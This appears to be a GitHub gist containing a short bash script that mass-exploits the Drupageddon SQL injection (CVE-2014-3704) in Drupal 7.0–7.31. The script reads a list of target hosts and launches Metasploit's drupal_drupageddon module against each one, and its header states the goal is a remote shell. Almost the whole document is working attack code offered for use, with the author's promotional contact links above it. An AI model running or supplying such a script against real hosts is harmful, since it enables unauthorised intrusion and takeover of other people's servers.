Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
MINI-EXPLOIT // Drupal HTTP Parameter Key/Value SQL Injection
#!/bin/bash
: '
MINI-EXPLOIT // Metasploit->Drupal HTTP Parameter Key/Value SQL Injection
This module exploits the Drupal HTTP Parameter Key/Value SQL Injection
(aka Drupageddon) in order to achieve a remote shell on the vulnerable instance.
This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).
Exploração: Drupal 7.0 - 7.31
-----------------------------------------------------------------------
AUTOR-SCRIPT-OTIMIZADOR:
Cleiton Pinheiro / Nick: googleINURL
[+] EMAIL: inurlbr@gmail.com
[+] Blog: http://blog.inurl.com.br
[+] Twitter: https://twitter.com/googleinurl
[+] Fanpage: https://fb.com/InurlBrasil
[+] Pastebin http://pastebin.com/u/Googleinurl
[+] GIT: https://github.com/googleinurl
[+] PSS: http://packetstormsecurity.com/user/googleinurl
[+] EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
[+] YOUTUBE: http://youtube.com/c/INURLBrasil
[+] PLUS: http://google.com/+INURLBrasil
-----------------------------------------------------------------------
Use:
./Drupal7.0-7.31.sh hosts.txt
'
# CVE-2014-3704
# SOURCE MODULE:
# http://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon
# URL: https://www.drupal.org/SA-CORE-2014-005
# URL: http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
echo "[+] MINI-EXPLOIT / Metasploit->(Drupal HTTP Parameter Key/Value SQL Injection) - INURL BRASIL"
filename=$1
filelines=`cat $filename`
exploit='exploit/multi/http/drupal_drupageddon'
echo "[+] [ START PROCESS ]"
echo "[+] [EXPLOIT] $exploit"
for line in $filelines ; do
echo "----------------------------------------------------------------------------------"
echo "=================================================================================="
echo "----------------------------------------------------------------------------------"
echo "[+] [ TARGET ] " $line
echo "[!] [ exec ] metasploit..."
msfconsole -x "use $exploit;set RHOST $line;exploit;exit;"
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.